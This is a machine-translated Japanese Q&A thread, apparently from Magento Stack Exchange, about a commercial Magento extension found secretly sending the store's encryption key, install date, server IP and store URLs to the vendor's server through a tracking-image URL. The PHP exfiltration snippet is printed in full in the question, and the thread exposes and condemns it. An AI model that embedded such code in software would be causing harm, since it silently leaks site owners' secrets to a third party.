モジュールがリモートでグローバル/暗号化/キーにアクセスする正当な理由はありますか?


19

私の無知を許しますが、Magentoのデータを解読するために暗号鍵が使用されますよね?モジュールがこれにアクセスする正当な理由はありますか?Advanced Content Managerをインストールした後、このコードを見つけました...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />


3
この。です。恐ろしい。暗号化キーを漏らす理由はありません。
ファビアンBlechschmidt

1
これは悪い、非常に悪いです。
アンナフォルクル

1
ナイスキャッチ!これは非常に悪いです...
サンダーマンジェル

1
@Sanderに感謝します。Connectから削除されました。
ベンマーク

1
@benmarksはそれを聞いてうれしいです。これは明白な理由だけでなく、アプリが非常に印象的であり、開発者が過去に非常に有用かつ迅速であったため、非常に残念です。
タイラーズSN

回答:


11

はい...正当な理由があります。
念のために、彼らはそれを知り、それを記録したいのです。:)

拡張機能をアンインストールする必要があります(ほとんどの場合、既に実行しています)。自宅に送信するデータに関係なく、「自宅に電話する」拡張機能を使用しないでください。

他の人が見るためにここに拡張機能をリストしたいかもしれません:Magento Extensionsの面白い/役に立たない/恐ろしいコード


1
残念ながら、「電話をかける」ことは多くのモジュールによって行われます。AmastyとAheadworksも同様に行います:\
サンダーマンジェル

4
このgist.github.com/miguelbalparda/b57a47a010a5995bc44dを使用して、すべてのフォルダーexcel app / code / coreでCLIからglobal / crypt / keyを確認できます。
mbalparda

したがって、彼らはccデータ(私は保存しません)のパスワードなどを解読できるだけでなく、その能力を得るために300ドルを支払いました。それがFunnyに投稿されるべきものです。
タイラーズSN

1
@iUseMagentoNow。これは面白い「ああ」であり、面白い「ハハ」ではありません。返金を要求する必要があります。
マリウス

8

本日、この機能に関するサポートリクエストを受け取りました。すでに解決し、このコードを削除しました。顧客エリアのすべてのお客様が新しいリリースを利用できます(無制限のアップデートを提供しているため、無料です)。

私たちはこれを正当化する必要があることを知っているので、そうしましょう:

  • このトラッカーの目標は、拡張機能の不正使用を追跡することのみでした。
  • トラッカーは、管理領域にのみ表示されました(お客様も、お客様も弊社も確認できたお客様はいませんでした)。
  • これもDBで削除しました。
  • キーは、管理者パスワードを暗号化することのみです。サポートリクエストによりすべてのお客様と連携するため、サポートのためにとにかく既にメールで資格情報を送信している場合があります。パスワードが必要な場合は、直接送信します...これは目標ではありませんでした。
  • キーがあっても、パスワードは暗号化されたままです。また、magento管理者はいくつかの試行後にユーザーをブロックします。

私たちはそれが間違いであることを認識しており、これがコミュニティとオープンソースシステムの強みです。修正と改善をより迅速に行うことができます。私たちに警告してくれてありがとう、私たちは今、脆弱性にもっと努力します。


3
ここ+1 Magento SEで公に応答するための努力をしてくれました!
7ochem

2
拡張機能の不正使用?!そのために単にドメインを使用できます。
mbalparda
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.